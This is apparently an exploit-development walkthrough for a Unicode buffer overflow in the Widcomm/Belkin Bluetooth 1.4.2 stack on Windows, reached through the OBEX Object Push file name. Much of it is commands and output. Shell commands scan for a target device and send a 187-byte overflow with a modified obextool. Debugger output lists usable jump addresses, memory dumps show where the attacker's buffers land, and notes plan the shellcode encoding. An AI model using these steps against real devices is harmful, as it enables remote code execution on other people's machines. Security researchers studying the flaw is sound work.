Widcomm 1.42 win32 bluetooth driver exploit made public by pentest.co.uk ? These memory offsets are for the Belkin Bluetooth Software 1.4.2 Build 10 BY default Local Services PIM Item Transfer is set to Auto Startup with Secure Connection Not Required. Scan for a vuln device. animosity:~/ussp-push-0.2# hcitool scan Scanning ... 00:0A:3A:54:71:95 THREAT-WIN32 Locate the service channel animosity:~/ussp-push-0.2# sdptool search OPUSH 00:0A:3A:54:71:95 Inquiring ... Searching for OPUSH on 00:0A:3A:54:71:95 ... Service Name: PIM Item Transfer Service RecHandle: 0x10007 Service Class ID List: "OBEX Object Push" (0x1105) Protocol Descriptor List: "L2CAP" (0x0100) "RFCOMM" (0x0003) Channel: 3 "OBEX" (0x0008) Language Base Attr List: code_ISO639: 0x656e encoding: 0x6a base_offset: 0x100 Profile Descriptor List: "OBEX Object Push" (0x1105) Version: 0x0100 Break out modified obextool animosity:~/ussp-push-0.2# ./obextool Bluetooth OBEX tool Usage: obextool [options] Options: -i [hciX|bdaddr] Local HCI device or BD Address -h, --help Display help Commands: push [channel] Push a file Stuff some test shellcode into a file. This is limited to 300 some odd bytes. animosity:~/ussp-push-0.2# echo `perl -e 'print "Z" x 230'` > shellcode More test shellcode, this is limited to 248 chars. Do not make this name to long or you will crash BTTray.exe. animosity:~/ussp-push-0.2# hciconfig hci0 name `perl -e 'print "B" x 100'` animosity:~/ussp-push-0.2# hciconfig hci0 name hci0: Type: USB BD Address: 00:10:7A:5D:49:4E ACL MTU: 192:8 SCO MTU: 64:8 Name: 'BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB' Upon connection to the remote machine a registry key will be added for HKEY_LOCAL_MACHINE\SOFTWARE\Widcomm\BTConfig\Devices\ the entry will contain the above device name. The Devices key is something you will want to keep clean as you develop your exploit. If you make use of the device name for shellcode it will be cached by the Stack Server. Reboots and registry flushes can become a routine event if you use this buffer. Attach Olly to BTSTAC~1 BTW Stack Server on the box you are attacking. With this version / vendor package the length to overflow is 187 bytes. animosity:~/ussp-push-0.2# ./obextool push shellcode 00:0A:3A:54:71:95 `perl -e 'print "A" x 187'` 3 Sending object ... (hang) This will cause EIP and EBP to be overwritten with 0x00410041. Unicode overflows == pain in the ass. Break out OllyUni.dll 0.10 complements of FX and Phenoelit. Skylined I appreciate you mentioning this to me btw. Address Message OllyUni plugin v0.10 (Unicode/RetDiff/Filter/SPret) Copyright (C) 2003,2004, FX of Phenoelit disabling trace points File 'C:\PROGRA~1\Belkin\BLUETO~1\BTSTAC~1.EXE' ... 00410041 Illegal instruction Running Unicode analysis from 0x004100AA (thread 1992) 0 previous results deleted 36916 directly addressable sections found, 7261 usable, 0 filtered 00140076 CALL reg found! (CALL ECX) 00140076 Address found, 100.00% chance to reach it ... 00F000B7 JMP reg found! (JMP ECX) 00F000B7 Address found, 100.00% chance to reach it ... 00F2000B JMP reg found! (JMP ECX) 00F20008 Address found, 100.00% chance to reach it ... 00F2000B JMP reg found! (JMP ECX) 00F20009 Address found, 100.00% chance to reach it ... 00F2000B JMP reg found! (JMP ECX) 00F2000A Address found, 100.00% chance to reach it ... 00F2000B JMP reg found! (JMP ECX) 00F2000B Address found, 100.00% chance to reach it ... 00F20037 CALL reg found! (CALL ECX) 00F20037 Address found, 100.00% chance to reach it ... 00F8019B CALL reg found! (CALL ECX) 00F80192 Address found, 100.00% chance to reach it ... 00F9010B JMP reg found! (JMP ECX) 00F900A4 Address found, 50.00% chance to reach it ... 00FB00FF CALL reg found! (CALL ECX) 00FB00F9 Address found, 50.00% chance to reach it ... 00FB00FF CALL reg found! (CALL ECX) 00FB00FB Address found, 50.00% chance to reach it ... 00FB00FF CALL reg found! (CALL ECX) 00FB00FD Address found, 50.00% chance to reach it ... 00FB00FF CALL reg found! (CALL ECX) 00FB00FF Address found, 100.00% chance to reach it ... 00FD003F JMP reg found! (JMP ECX) 00FD003F Address found, 100.00% chance to reach it ... 00FD00C7 JMP reg found! (JMP ECX) 00FD00C7 Address found, 100.00% chance to reach it ... 00FE00FB CALL reg found! (CALL ECX) 00FE00FB Address found, 100.00% chance to reach it ... 00FE00FF CALL reg found! (CALL ECX) 00FE00FE Address found, 100.00% chance to reach it ... 00FE00FF CALL reg found! (CALL ECX) 00FE00FF Address found, 100.00% chance to reach it We are kinda fucked with regards to space of Unicode shellcode. So lets just do the jmp and see what we have to work with. We only have 185 bytes in the file name buffer. (can we place more code after eip safely?) animosity:~/ussp-push-0.2# ./obextool push shellcode 00:0A:3A:54:71:95 `perl -e 'print "A" x 185 . "\xFE\xFF"'` 3 Sending object ... We chose the jump at 0x00fe00ff and we set a break point on that in olly just to see whats going on. Olly pauses on the Memory Access. Click play and we should crash on an ADD BYTE PTR DS:[EAX],AL aka 0x0000. The crash is at 0x0053C82C which is the instruction right after the unicode string that was in ECX. Just before this instruction was: ADD BYTE PTR DS:[ECX],AL aka 0x004100 followed by INC ECX aka 0x41. Immediately after that would logically be our return address in this case a jump into ECX. INC DWORD PTR DS:[EAX] 0xFF00 and INC BYTE PTR DS:[EAX] 0xFE00. This means we successfully jumped into ecx and executed some code. The unicode string starts at 0x0053C71D UNICODE "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"... You have 185 bytes to make the magic happen. The memory layout which includes the file name looks like this after the attack. 0053C443 ................................................................ 0053C483 .........................................C.:.\.D.o.c.u.m.e.n.t. 0053C4C3 s. .a.n.d. .S.e.t.t.i.n.g.s.\.A.d.m.i.n.i.s.t.r.a.t.o.r.\.M.y. . 0053C503 D.o.c.u.m.e.n.t.s.\.B.l.u.e.t.o.o.t.h. .E.x.c.h.a.n.g.e. .F.o.l. 0053C543 d.e.r.\.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A. 0053C583 A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A. 0053C5C3 A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A. 0053C603 A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A. 0053C643 A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A. 0053C683 A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.7.A.A..... 0053C6C3 A7x7x7x7x7x7x7x7x7x7x7x7x7x7x7x7x7x7x7x7x7x7x7x7x7x7x7x7x7x7x7x7 0053C703 x7x7x7x7x7x7x7x7x7x7x7x7x7A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A. 0053C743 A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A. 0053C783 A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A. 0053C7C3 A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A. 0053C803 A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A......................... 0053C843 ................................................................ The bluetooh name of the connecting device is also visible in memory at the time. 0053D4E4 ......................................?.......K.....z]IN 0053D524 BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB 0053D564 BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB............................ 0053D5A4 ................................................................ The contents of the file that you transfered can also be seen. 0057F75C W..................................................UU..... 0057F79C ZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ 0057F7DC ZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ 0057F81C ZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ 0057F85C ZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ.......................... 0057F89C ................UUW....................................... Keep in mind that 2 of the buffers are ascii based. This could help loads! Skylineds aplha2 code or FX's vene.pl will obviously need to be used. Can we encode a Short Relative jump or a Three byte near jump?